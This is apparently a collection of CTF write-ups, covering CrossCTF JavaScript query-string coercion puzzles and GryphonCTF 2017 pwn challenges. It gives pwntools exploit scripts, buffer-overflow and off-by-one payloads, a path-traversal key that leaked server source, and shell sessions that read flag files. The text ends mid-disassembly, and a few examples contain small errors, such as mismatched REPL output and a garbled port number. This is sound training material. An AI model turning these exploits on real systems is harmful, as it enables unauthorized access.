In Express, req.query is an object containing the parsed query string parameters – so req.query.first can either be a string (?first=) or an array (?first[]=).

In JavaScript, an arrray is a list-like Object. Furthermore, Array.toString() returns a string representation of the array values, concatenating each array element separated by commas, as shown below:

> ['a'].toString()
a

> ['a','b'].toString()
a,b

Solution

As such, we can set req.query.first as an array with length 8 containing only empty strings to make the string representation return ,,,,,,, to satisfy both conditions:

> console.log(['','','','','','','',''].toString())
,,,,,,,

This can be achieved by supplying eight first[] query string parameters:

http://ctf.pwn.sg:8081/flag?first[]&first[]&first[]&first[]&first[]&first[]&first[]&first[]

Flag: CrossCTF{C0mm4s_4ll_th3_w4y_t0_th3_fl4g}


QuirkyScript 2

Problem

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
var flag = require("./flag.js");
var express = require('express')
var app = express()

app.get('/flag', function (req, res) {
  if (req.query.second) {
    if (req.query.second != "1" && req.query.second.length == 10 && req.query.second == true) {
      res.send(flag.flag);
      return;
    }
  }
  res.send("Try to solve this.");
});

app.listen(31337)

Analysis

Similar to QuirkyScript 1, req.query.second can either be a string or an array. Observe that loose equality comparison is done in req.query.second == true, so if req.query.second is a string, both operands are converted to numbers before comparing both values.

Note: The behavior of the type conversion to number is equivalent to the unary + operator (e.g. +"1"):

> true == +true == 1
true

> "1" == +"1" == 1 == true
true

One thing to note about such type conversions is that the parsing of value is performed quite leniently to avoid returning errors for minor issues detected:

> +"   1   "
1

> +"  00001" 
1

Solution

Since req.query.second != "1" performs string comparison without type conversions, we can obtain the flag by supplying a truthy value with 10 characters in second query string parameter:

http://ctf.pwn.sg:8082/flag?second=0000000001

Flag: CrossCTF{M4ny_w4ys_t0_mak3_4_numb3r}


QuirkyScript 3

Problem

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
var flag = require("./flag.js");
var express = require('express')
var app = express()

app.get('/flag', function (req, res) {
  if (req.query.third) {
    if (Array.isArray(req.query.third)) {
      third = req.query.third;
      third_sorted = req.query.third.sort();
      if (Number.parseInt(third[0]) > Number.parseInt(third[1]) && third_sorted[0] == third[0] && third_sorted[1] == third[1]) {
        res.send(flag.flag);
        return;
      }
    }
  }
  res.send("Try to solve this.");
});

app.listen(31337)

Analysis

Observe that req.query.third.sort() is invoked above, so req.query.third has to be an array since string does not have a sort() prototype method.

The following conditions need to be satisfied to obtain the flag:

  • Number.parseInt(third[0]) > Number.parseInt(third[1]) – first element must be larger than the second element after converting both elements to numbers
  • third_sorted[0] == third[0] and third_sorted[1] == third[1] – the elements in third must retain the same order even after being sorted

As pointed out in the documentation, if no custom comparition function is supplied to Array.prototype.sort(), all non-undefined array elements are sorted by (1) converting them to strings and (2) comparing string comparisons in UTF-16 code point order.

Such lexical sorting differs from numeric sorting. For example, 10 comes before “2” when sorting based on their UTF-16 code point:

> third = ["10", "1a"]
["10", "2"]

> third_sorted = third.sort()
["10", "2"]

> Number.parseInt(third[0])
10

> Number.parseInt(third[1])
1

> Number.parseInt(third[0]) > Number.parseInt(third[1])
true

> third_sorted[0] == third[0] && third_sorted[1] == third[1]
true

Solution

To obtain the flag, we can set third query string parameter as an array with 10 as first element and 2 as second element:

http://ctf.pwn.sg:8083/flag?third[0]=10&third[]=2

Flag: CrossCTF{th4t_r0ck3t_1s_hug3}


QuirkyScript 4

Problem

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
var flag = require("./flag.js");
var express = require('express')
var app = express()

app.get('/flag', function (req, res) {
  if (req.query.fourth) {
    if (req.query.fourth == 1 && req.query.fourth.indexOf("1") == -1) {
      res.send(flag.flag);
      return;
    }
  }
  res.send("Try to solve this.");
});

app.listen(31337)

Analysis

If req.query.fourth is a string containing a truthy value, it is not possible to satisfy the req.query.fourth.indexOf("1") == -1 condition.

Let’s look at what we can do if req.query.fourth is an array instead. Type conversion happens on req.query.fourth in req.query.fourth == 1 before comparing the operands:

> +([""].toString())
0

> ["1"] == +(["1"].toString()) == 1
true

Since Array.prototype.indexOf(element) returns the index of the first matching element in the array, or -1 if it does not exist, we can satisfy req.query.fourth.indexOf("1") == -1 if the string "1" is not in the array.

Solution 1

One possible solution is to leverage the relaxed parsing of integer values from strings as discussed in QuirkyScript 2:

> ["01"] == +(["01"].toString()) == 1
true

> ["01"].indexOf("1") == -1
true

Visiting http://ctf.pwn.sg:8084/flag?fourth[]=01 gives the flag.

Solution 2

Another possible solution is to use a nested array:

> [["1"]] == [["1"].toString()].toString() == 1
true

> [["1"]].indexOf("1") == -1
true

Visiting http://ctf.pwn.sg:8084/flag?fourth[][]=1gives the flag.

Flag: CrossCTF{1m_g0ing_hungry}


QuirkyScript 5

Problem

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
var flag = require("./flag.js");
var express = require('express')
var app = express()

app.get('/flag', function (req, res) {
  var re = new RegExp('^I_AM_ELEET_HAX0R$', 'g');
  if (re.test(req.query.fifth)) {
    if (req.query.fifth === req.query.six && !re.test(req.query.six)) {
      res.send(flag.flag);
    }
  }
  res.send("Try to solve this.");
});

app.listen(31337)

Analysis

Referring to the documentation for RegExp.prototype.test(), an interesting behaviour of regular expressions with g (global) flag set is noted:

  1. test() will advance the lastIndex of the regex.
  2. Further calls to test(str) will resume searching str starting from lastIndex.
  3. The lastIndex property will continue to increase each time test() returns true.

Note: As long as test() returns true, lastIndex will not reset—even when testing a different string!

Solution

After the call to re.test(req.query.fifth), re.lastIndex is no longer 0 if req.query.fifth is set to I_AM_ELEET_HAX0R. By setting req.query.six to I_AM_ELEET_HAX0R, we can make re.test(req.query.six) return false:

> re = new RegExp('^I_AM_ELEET_HAX0R$', 'g')
/^I_AM_ELEET_HAX0R$/g

> re.lastIndex
0

> re.test("I_AM_ELEET_HAX0R")
true

> re.lastIndex
16

> "I_AM_ELEET_HAX0R" === "I_AM_ELEET_HAX0R"
true

> !re.test("I_AM_ELEET_HAX0R")
false

> re.lastIndex
0

As such, visiting the URL below gives the flag:

http://ctf.pwn.sg:8085/flag?fifth=I_AM_ELEET_HAX0R&six=I_AM_ELEET_HAX0R

Flag: CrossCTF{1_am_n1k0las_ray_zhizihizhao}

Here are my analysis and solutions for some of the pwnable challenges.

NoobPwn

Problem

Description:
Getting tired of pwn? How about an easier one?
nc pwn2.chal.gryphonctf.com 17346

Source code of noobpwn.c:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
/**
 * Created for the GryphonCTF 2017 challenges
 * By Amos (LFlare) Ng <amosng1@gmail.com>
**/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(int argc){
    // Create buffer
    char buf[32] = {0x00};
    int key = 0x00;

    // Disable output buffering
    setbuf(stdout, NULL);

    // Get key?
    printf("Key? ");
    scanf("%d", &key);

    // Create file descriptor
    int fd = key - 0x31337;
    int len = read(fd, buf, 32);

    // Check if we have a winner
    if (!strcmp("GIMMEDAFLAG\n", buf)) {
        system("/bin/cat flag.txt");
        exit(0);
    }

    // Return sadface
    return 1;
}

Analysis

The important section of the code is as follows:

scanf("%d", &key);                    // user input

// Create file descriptor
int fd = key - 0x31337;               // compute file descriptor number
int len = read(fd, buf, 32);          // here, we want to read from stdin

// Check if we have a winner
if (!strcmp("GIMMEDAFLAG\n", buf)) {  // string comparison of our input with static string
    system("/bin/cat flag.txt");      // get flag!
    exit(0);
}

We want to ensure that read() reads from standard input (fd = 0) so that the program can receive user input. To do this, we simply set key = 0x31337 and send it over in its decimal representative (not hex representative!).

After that, we send "GIMMEDAFLAG\n" to ensure that !strcmp("GIMMEDAFLAG\n", buf) evaluates to true and end up calling system("/bin/cat flag.txt").

Solution

Source code of exploit.py:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
#!/usr/bin/env python

from pwn import *
context(arch = 'i386', os = 'linux')

HOST = 'pwn2.chal.gryphonctf.com'
PORT = 17346

key = 0x31337 # fd = 0x31337 - 0x31337 => 0
static_str = 'GIMMEDAFLAG'

def main():
    r = remote(HOST, PORT)

    r.sendlineafter('Key? ', str(key))
    r.sendline(static_str)

    print(r.recvall())

if __name__ == '__main__':
    main()

Execution of the exploit script:

$ python exploit.py
[+] Opening connection to pwn2.chal.gryphonctf.com on port 17346: Done
[+] Receiving all data: Done (33B)
[*] Closed connection to pwn2.chal.gryphonctf.com port 17346
GCTF{f1l3_d35cr1p70r5_4r3_n457y}

Flag: GCTF{f1l3_d35cr1p70r5_4r3_n457y}


PseudoShell

Problem

Description:
I managed to hook on to a shady agency’s server, can you help me secure it?
nc pwn2.chal.gryphonctf.com 17341

Source code of pseudoshell.c:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
/**
 * Created for the GryphonCTF 2017 challenges
 * By Amos (LFlare) Ng <amosng1@gmail.com>
**/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int login() {
    // Declare login variables
    int access = 0xff;
    char password[16];

    // Get password
    puts("Warning: Permanently added 'backend.cia.gov,96.17.215.26' (ECDSA) to the list of known hosts.");
    printf("root@backend.cia.gov's password: ");

    // Add one more to fgets for null byte
    fgets(password, 17, stdin);

    return access;
}

int main() {
    // Disable output buffering
    setbuf(stdout, NULL);

    // Declare main variables
    char input[8];

    // Send canned greeting
    puts("The authenticity of host 'backend.cia.gov (96.17.215.26)' can't be established.");
    puts("ECDSA key fingerprint is SHA256:1loFo62WjwvamuIcfhqo4O2PNdltJgSJ7fB3GpKLm4o.");
    printf("Are you sure you want to continue connecting (yes/no)? ");

    // Add one more to fgets for null byte
    fgets(input, 9, stdin);

    // Log user in
    int access = login();

    // Check privileges
    if (access >= 0xff || access < 0) {
        puts("INVALID ACCOUNT ACCESS LEVEL!");
    } else if (access <= 0x20) {
        puts("SUCCESSFULLY LOGGED IN AS ADMIN!");
        system("/bin/sh");
    } else {
        puts("SUCCESSFULLY LOGGED IN AS USER!");
        puts("ERROR: YOU HAVE BEEN FIRED!");
        exit(1);
    }
}

Analysis

There is an obvious off-by-one write vulnerability in both login() and main():

int login() {
    // Declare login variables
    int access = 0xff;
    char input[8];
    ...
    // Add one more to fgets for null byte
    fgets(input, 9, stdin);
    ...
}

int main() {
    ...
    // Declare main variables
    char input[8];
    ...
    // Add one more to fgets for null byte
    fgets(input, 9, stdin);
}

Our goal is to make access <= 0x20 so that we can get shell and read the flag file:

// Log user in
int access = login();

// Check privileges
...
else if (access <= 0x20) {
    puts("SUCCESSFULLY LOGGED IN AS ADMIN!");
    system("/bin/sh");
}

Notice that in login(), int access = 0xff; is placed directly before char input[8];.
Since the binary uses little-endian, access is stored as \x00\x00\x00\xff in memory.
As such, the off-by-one write causes the last byte of user input to overflow and overwrite the least significant byte of int access.

To get the shell, we can simply send 16 characters to fill the password and any character with decimal value <= 0x20.

Solution

Source code of exploit.py:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
#!/usr/bin/env python

from pwn import *
context(arch = 'i386', os = 'linux')

HOST = 'pwn2.chal.gryphonctf.com'
PORT = 17341

padding = "A" * 16
access  = chr(0x20)
payload = padding + access

def main():
    r = remote(HOST, PORT)
    
    r.sendlineafter('(yes/no)? ', '')
    r.sendlineafter('password: ', payload)

    r.interactive()

if __name__ == '__main__':
    main()

Execution of the exploit script:

$ python exploit.py
[+] Opening connection to pwn2.chal.gryphonctf.com on port 17341: Done
[*] Switching to interactive mode
SUCCESSFULLY LOGGED IN AS ADMIN!
$ ls -al
total 32
drwxr-xr-x 1 root root        4096 Oct  4 13:22 .
drwxr-xr-x 1 root root        4096 Oct  4 13:16 ..
-rw-r--r-- 1 root root         220 Oct  4 13:16 .bash_logout
-rw-r--r-- 1 root root        3771 Oct  4 13:16 .bashrc
-rw-r--r-- 1 root root         655 Oct  4 13:16 .profile
-r--r----- 1 root pseudoshell   30 Sep 30 17:57 flag.txt
-rwxr-sr-x 1 root pseudoshell 7628 Sep 30 17:57 pseudoshell
$ cat flag.txt
GCTF{0ff_by_0n3_r34lly_5uck5}

Flag: GCTF{0ff_by_0n3_r34lly_5uck5}


FileShare

Problem

Description:
I created this service where you can leave files for other people to view!
I have been getting good reviews..what do you think about it?
nc pwn1.chal.gryphonctf.com 17342

This is a remote-only challenge.

Analysis

Let’s netcat in to understand more about the service.

$ nc pwn1.chal.gryphonctf.com 17342

          `ohmmmmmmmmmmmmmmmmmh:                  
         -NMMhyyyyyyyyyyyyyyNMMMd:                
         sMMo               mMMNMMd:              
         sMMo               mMM-+mMMd:            
         sMMo               mMM/.-sMMMd:          
         sMMo               mMMMMMMMMMMMo         
         sMMo               :////////yMMs         
         sMMo                        oMMs         
         sMMo                        oMMs         
         sMMo                        oMMs         
         sMMo                        oMMs         
         sMMo                        oMMs         
         sMMo                        oMMs
         oMMs                        oMMs
         oMMs                        oMMs
         sMMo                        oMMs         
         sMMo                        oMMs         
         sMMo                        oMMs         
         sMMo                        oMMs         
         -NMMhyyyyyyyyyyyyyyyyyyyyyyhMMN-         
          `ohmmmmmmmmmmmmmmmmmmmmmmmmho`          

YOU ARE ZE NO.58875 USER
WELCOME TO THE GREATEST FILE SHARING SERVICE IN ALL OF ZE WORLD!
           a)  CREATE FILE
           b)  VIEW FILE
YOUR INPUT => b
YOU HAVE CHOSEN TO VIEW FILE
PLEASE INPUT KEY! => ABCDE
Traceback (most recent call last):
  File "/home/fileshare/FS.py", line 29, in gets
    kkkk=base64.b64decode(filename).decode()
  File "/usr/lib/python3.5/base64.py", line 88, in b64decode
    return binascii.a2b_base64(s)
binascii.Error: Incorrect padding
Wrong key, no such file
GOODBYE!

Interesting! Upon reading an invalid filename (non-Base64 encoded), the stack trace is dumped.
From the stack trace, we can see the filename of the service /home/fileshare/FS.py is being leaked.

Let’s try creating a file and reading it to see if it works as expected:

$ nc pwn1.chal.gryphonctf.com 17342
...
YOUR INPUT => a
YOU HAVE CHOSEN TO MAKE FILE!
PLEASE INPUT NAME!(3-5 CHARAS ONLY) => AAAAA
PLEASE INPUT MESSAGE  => BBBBBBBBBBBBBBBBBBBB
FILES CREATED! HERE IS YOUR KEY WydmaWxlcy9RR1YnLCAnQUFBQUEnXQ==
GOODBYE!

$ nc pwn1.chal.gryphonctf.com 17342
YOUR INPUT => b
YOU HAVE CHOSEN TO VIEW FILE
PLEASE INPUT KEY! => WydmaWxlcy9RR1YnLCAnQUFBQUEnXQ==
~~~~~~~~~~~~~~~~~~~~~~~~

FILE FROM: AAAAA
FILE CONTENTS:

BBBBBBBBBBBBBBBBBBBB

…and the program works as advertised.

Let’s take a closer look at the Base64 key generated by the server:

$ echo "WydmaWxlcy9RR1YnLCAnQUFBQUEnXQ==" | base64 --decode
['files/QGV', 'AAAAA']

This suggests that perhaps it is reading from ./files/QGV. What if we trick the service to read FS.py (the python script for the service) instead?

$ echo "['./FS.py', 'AAAAA']" | base64
WycuL0ZTLnB5JywgJ0FBQUFBJ10K

$ nc pwn1.chal.gryphonctf.com 17342
...

YOUR INPUT => b
YOU HAVE CHOSEN TO VIEW FILE
PLEASE INPUT KEY! => WycuL0ZTLnB5JywgJ0FBQUFBJ10K
~~~~~~~~~~~~~~~~~~~~~~~~

FILE FROM: AAAAA
FILE CONTENTS:

#!/usr/bin/env python3
import base64
import ast
from datetime import datetime
import time
import os
import socket
import threading
import random
import traceback
def check(stri):
    k=0
    for i in stri:
        k=k+ord(i)
    return k
def filename():
   return ''.join(random.choice("QWERTYUIOPASDFGHJKLZXCVBNM") for i in range(3))
def create(line,nam,c):
    k="/home/fileshare/"
    name="files/"+filename()
    f=open(k+name,"w")
    print(line,file=f)
    n=[name,nam]
    k=str(n)
    return base64.b64encode(k.encode()).decode()
def gets(filename,c):
    kul="/home/fileshare/"
    try:
        kkkk=base64.b64decode(filename).decode()
        l=ast.literal_eval(kkkk)
        if len(l)==2 and len(l[1])>=3:
            c.sendall("~~~~~~~~~~~~~~~~~~~~~~~~\n\nFILE FROM: {}\nFILE CONTENTS: \n\n".format(l[1]).encode())
            f=open(kul+l[0],"r")
            jj=f.readlines()
            for i in jj:
               z=i
               c.sendall(z.encode())
            c.sendall("\n\n~~~~~~~~~~~~~~~~~~~~~~~~\n\n".encode())
        else:
            c.sendall("INVALID KEY!\n".encode())
    except Exception as e:
        error=traceback.format_exc()
        c.sendall(error.encode())
        z="Wrong key, no such file\n"
        c.sendall(z.encode())


def start(c,a,user):
    kkk="QQTLBFVLZFCJHABTKQWYYTBLTLNENP"
    try:
        c.sendall('''
          `ohmmmmmmmmmmmmmmmmmh:                  
         -NMMhyyyyyyyyyyyyyyNMMMd:                
         sMMo               mMMNMMd:              
         sMMo               mMM-+mMMd:            
         sMMo               mMM/.-sMMMd:          
         sMMo               mMMMMMMMMMMMo         
         sMMo               :////////yMMs         
         sMMo                        oMMs         
         sMMo                        oMMs         
         sMMo                        oMMs         
         sMMo                        oMMs         
         sMMo                        oMMs         
         sMMo                        oMMs
         oMMs                        oMMs
         oMMs                        oMMs
         sMMo                        oMMs         
         sMMo                        oMMs         
         sMMo                        oMMs         
         sMMo                        oMMs         
         -NMMhyyyyyyyyyyyyyyyyyyyyyyhMMN-         
          `ohmmmmmmmmmmmmmmmmmmmmmmmmho`          

YOU ARE ZE NO.{} USER
WELCOME TO THE GREATEST FILE SHARING SERVICE IN ALL OF ZE WORLD!
           a)  CREATE FILE
           b)  VIEW FILE
YOUR INPUT => '''.format(user).encode())
        c.settimeout(2*60)
        r=c.recv(100).decode().strip()
        if r=="a":
            c.sendall("YOU HAVE CHOSEN TO MAKE FILE!\nPLEASE INPUT NAME!(3-5 CHARAS ONLY) => ".encode())
            c.settimeout(60*2)
            nam=c.recv(135).decode().strip()
            c.sendall("PLEASE INPUT MESSAGE  => ".encode())
            lll=c.recv(125).decode().strip()
            print(len(nam))
            print(len(lll))
            if len(lll)>130 or (len(nam)<3 or len(nam)>5):
                c.sendall("sorry invalid input :(\n".encode())
                c.sendall("GOODBYE!\n".encode())
                c.close()
            else:
                key=create(lll,nam,c)
                z="FILES CREATED! HERE IS YOUR KEY "+key
                c.sendall(z.encode())
                c.sendall("\nGOODBYE!\n".encode())
                c.close()
        elif r=="b":
            c.sendall("YOU HAVE CHOSEN TO VIEW FILE\nPLEASE INPUT KEY! => ".encode())
            c.settimeout(60*2)
            lll=c.recv(100).decode().strip()
            if(len(lll)>33):
                c.sendall("KEY TOO LONG, INVALID\nGOODBYE\n".encode())
                c.close()
            else:
                gets(lll,c)
                c.sendall("GOODBYE!\n".encode())
                c.close()
        elif r==kkk:
            f=open("/home/fileshare/flag/thisisalongnameforadirectoryforareasonflag.txt","r")
            k=f.readline()
            z="HELLO ADMINISTRATOR!\n~~~WELCOME TO THE ADMIN PORTAL~~~\n           a)  LIST ALL FILES\n           b)  PRINT FLAG\nYOUR INPUT => "
            c.sendall(z.encode())
            c.settimeout(60*2)
            h=c.recv(3).decode().strip()
            if h=="a":
                k=os.listdir("/home/fileshare/files/")
                for i in k:
                    i="- "+i+"\n"
                    c.sendall(i.encode())
                c.sendall("GOODBYE\n".encode())
            elif h=="b":
                c.sendall("PASSWORD PLS ! =>".encode())
                c.settimeout(60*2)
                z=c.recv(10).decode().strip()
                if int(z)==check("REALADMIN"):
                    c.sendall("HERES THE FLAG!\n".encode())
                    c.sendall(k.encode())
                else:
                    c.sendall("YOU ARE NOT REAL ADMIN! BYE\n".encode())
            else:
                c.sendall("INVALID!\nGOODBYE!\n".encode());
            c.close()
        else:
            c.sendall("invalid input!\n".encode())
            c.close()
    except Exception as e:
        error=traceback.format_exc()
        c.sendall(error.encode())
        c.close()


socket=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
socket.bind(('0.0.0.0',49760))
print(socket)
socket.listen(5)
user=0
while True:
    c,a=socket.accept()
    user=user+1
    t=threading.Thread(target=start,args=(c,a,user))
    t.start()
socket.close()

Wow! That actually worked, and now we have successfully leaked the source code of the service. Let’s focus on the notable portions of the code:

kkk="QQTLBFVLZFCJHABTKQWYYTBLTLNENP"
try:
    ...
    if r=="a":
        ...
    elif r=="b":
        ...
        lll=c.recv(100).decode().strip()
        if(len(lll)>33):
            c.sendall("KEY TOO LONG, INVALID\nGOODBYE\n".encode())
            c.close()
        else:
            gets(lll,c)
            ...
    elif r==kkk:
        f=open("/home/fileshare/flag/thisisalongnameforadirectoryforareasonflag.txt","r")
        ...
        h=c.recv(3).decode().strip()
        if h=="a":
            ...
        elif h=="b":
            c.sendall("PASSWORD PLS ! =>".encode())
            c.settimeout(60*2)
            z=c.recv(10).decode().strip()
            if int(z)==check("REALADMIN"):
                c.sendall("HERES THE FLAG!\n".encode())
                c.sendall(k.encode())

It seems that there is a hidden menu activated by entering QQTLBFVLZFCJHABTKQWYYTBLTLNENP, followed by b, and finally an input z containing an integer matching the value of check("REALADMIN"). Finally, if all the above checks are successful, the flag is printed using c.sendall(k.encode()).

Solution

First, we compute the integer value returned by check("REALADMIN"):

$ python
>>> def check(stri):
...     k=0
...     for i in stri:
...         k=k+ord(i)
...     return k
...
>>> check("REALADMIN")
653

Now, we can simply trigger the hidden menu and get the flag:

$ nc pwn1.chal.gryphonctf.com 17342
...
YOUR INPUT => QQTLBFVLZFCJHABTKQWYYTBLTLNENP
HELLO ADMINISTRATOR!
~~~WELCOME TO THE ADMIN PORTAL~~~
           a)  LIST ALL FILES
           b)  PRINT FLAG
YOUR INPUT => b
PASSWORD PLS ! => 653
HERES THE FLAG!
GCTF{in53cur3_fi13_tr4n5f3r}

Pitfalls

It’s important to also note that we cannot forge the key to read from the flag, as the filepath is too long as len('flag/thisisalongnameforadirectoryforareasonflag.txt') > 33 is true, so the filepath to the flag will be rejected by the service:

if(len(lll)>33):
    c.sendall("KEY TOO LONG, INVALID\nGOODBYE\n".encode())
    c.close()
else:
    gets(lll,c)
    ...

Flag: GCTF{in53cur3_fi13_tr4n5f3r}


Tsundeflow

Problem

Description:
This one is a handful.
pwn2.chal.gryphonctf.com 17343

Source code of tsundeflow.c:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
/**
 * Created for the GryphonCTF 2017 challenges
 * By Amos (LFlare) Ng <amosng1@gmail.com>
**/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int win() {
    puts("B-baka! It's not like I like you or anything!");
    system("/bin/sh");
}

int main() {
    // Disable output buffering
    setbuf(stdout, NULL);

    // Declare main variables
    char input[32];

    // User preface
    puts("I check input length now! Your attacks have no effect on me anymore!!!");
    printf("Your response? ");

    // Read user input
    scanf("%s", input);

    // "Check" for buffer overflow
    if (strlen(input) > 32) {
        exit(1);
    }
}

Analysis

Notice that scanf("%s", input); is being used, and there is a strlen(input) > 32 check for input. Using the %s format specifier does not limit the number of characters to be read into the variable, so we can write more than 32 bytes into input and overflow and replace the stored return address.

To pass the strlen check, we can exploit yet another property of scanf("%s") – it does not stop when reading a null byte, but instead, stops at spaces! In other words, we can send an input that has <= 32 bytes of padding, followed by a null byte, more padding and finally the address of win().

To calculate the number of padding bytes needed to reach the stored return address from input, we can use gdb with GEF:

$ gdb ./tsundeflow-redacted-fb0908a3d9a30c4029acfdfd5bdbe313
gef➤  pattern create 100
[+] Generating a pattern of 100 bytes
aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaa
gef➤  pattern create 100
gef➤  r < <(python -c 'print "A"*31 + "\x00" + "aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaa"')
Starting program: ./tsundeflow-redacted-fb0908a3d9a30c4029acfdfd5bdbe313 < <(python -c 'print "A"*31 + "\x00" + "aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaa"')
I check input length now! Your attacks have no effect on me anymore!!!
Your response?
Program received signal SIGSEGV, Segmentation fault.
0x61616261 in ?? ()
─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────[ registers ]────
$eax   : 0x00000000
$ebx   : 0x00000000
$ecx   : 0x00000018
$edx   : 0x00000008
$esp   : 0xffffd480  →  "acaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaao[...]"
$ebp   : 0x61616100
$esi   : 0xf7fb1000  →  0x001b1db0
$edi   : 0xf7fb1000  →  0x001b1db0
$eip   : 0x61616261 ("abaa"?)
$cs    : 0x00000023
$ss    : 0x0000002b
$ds    : 0x0000002b
$es    : 0x0000002b
$fs    : 0x00000000
$gs    : 0x00000063
$eflags: [carry PARITY adjust ZERO sign trap INTERRUPT direction overflow RESUME virtualx86 identification]
─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────[ stack ]────
0xffffd480│+0x00: "acaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaao[...]"$esp
0xffffd484│+0x04: "adaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaap[...]"
0xffffd488│+0x08: "aeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaq[...]"
0xffffd48c│+0x0c: "afaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaar[...]"
0xffffd490│+0x10: "agaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaas[...]"
0xffffd494│+0x14: "ahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaat[...]"
0xffffd498│+0x18: "aiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaau[...]"
0xffffd49c│+0x1c: "ajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaav[...]"
─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────[ code:i386 ]────
[!] Cannot disassemble from $PC
───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────[ threads ]────
[#0] Id 1, Name: "tsundeflow-reda", stopped, reason: SIGSEGV
─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────[ trace ]────
──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
gef➤  pattern search 0x61616261
[+] Searching '0x61616261'
[+] Found at offset 4 (little-endian search) likely
[+] Found at offset 1 (big-endian search)

From above, we can see that the stored return address is at 4 bytes offset from input[32].

gef➤  x/i win
   0x804857b <win>:    push   ebp

Solution

Source code of exploit.py:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
#!/usr/bin/env python

from pwn import *
context(arch = 'i386', os = 'linux')

HOST = 'pwn2.chal.gryphonctf.com'
PORT = 1734117343

input   = 'A' * 31 + '\x00'
padding = 'B' * 4
ret2win = p32(0x804857b)
payload = input + padding + ret2win

def main():
    r = remote(HOST, PORT)
    r.sendafter('Your response? ', payload)
    r.interactive()

if __name__ == '__main__':
    main()

Execution of the exploit script:

$ python exploit.py
[+] Opening connection to pwn2.chal.gryphonctf.com on port 17343: Done
[*] Switching to interactive mode
B-baka! It's not like I like you or anything!
$ ls -al
total 32
drwxr-xr-x 1 root root       4096 Oct  4 13:24 .
drwxr-xr-x 1 root root       4096 Oct  4 13:16 ..
-rw-r--r-- 1 root root        220 Oct  4 13:16 .bash_logout
-rw-r--r-- 1 root root       3771 Oct  4 13:16 .bashrc
-rw-r--r-- 1 root root        655 Oct  4 13:16 .profile
-r--r----- 1 root tsundeflow   43 Sep 30 17:57 flag.txt
-rwxr-sr-x 1 root tsundeflow 7636 Sep 30 17:57 tsundeflow
$ cat flag.txt
GCTF{51mpl3_buff3r_0v3rfl0w_f0r_75und3r35}

Flag: GCTF{51mpl3_buff3r_0v3rfl0w_f0r_75und3r35}


ShellMethod

Problem

Description:
I’ve taken the previous challenge, tossed away the personality and replaced it with a stone cold robot AI.
nc pwn2.chal.gryphonctf.com 17344

Source code of shellmethod.c:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
/**
 * Created for the GryphonCTF 2017 challenges
 * By Amos (LFlare) Ng <amosng1@gmail.com>
**/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int vuln() {
    // Declare main variables
    char command[64];

    // Get user's input
    puts("PLEASE STATE YOUR COMMAND.");
    printf("Your response? ");
    gets(command);
}

int main() {
    // Disable output buffering
    setbuf(stdout, NULL);

    // Greet and meet
    puts("HELLO. I AM SMARTBOT ALPHA 0.1.0.");
    vuln();

    // Deny user wishes immediately.
    puts("YOUR WISHES ARE DENIED.");
}

Analysis

An obvious unbounded reading of input via gets() function should be spotted from the above code.

Notice that the file does not come with any system("/bin/cat flag.txt") or system("/bin/sh") calls.
Let’s examine the security features that the executable has enabled before continuing:

$ checksec --file shellmethod-redacted-c6b75effab2d83da5a5a2d394a8d5c83
RELRO           STACK CANARY      NX            PIE             RPATH      RUNPATH	FORTIFY	Fortified Fortifiable  FILE
Partial RELRO   No canary found   NX disabled   No PIE          No RPATH   No RUNPATH   No	0		4	shellmethod-redacted-c6b75effab2d83da5a5a2d394a8d5c83

Great! No-eXecute (NX) bit is disabled, so we can easily gain arbitrary code execution by returning to our shellcode stored on the stack (if ASLR is disabled on the server)!

Let’s disassemble the vuln() function in gdb:

$ gdb ./shellmethod-redacted-c6b75effab2d83da5a5a2d394a8d5c83
gef➤  disassemble vuln
Dump of assembler code for function vuln:
   0x080484cb <+0>:	push   ebp
   0x080484cc <+1>:	mov    ebp,esp
   0x080484ce <+3>:	sub    esp,0x40
   0x080484d1 <+6>:	push   0x80485c0
   0x080484d6 <+11>:	call   0x80483a0 <puts@plt>
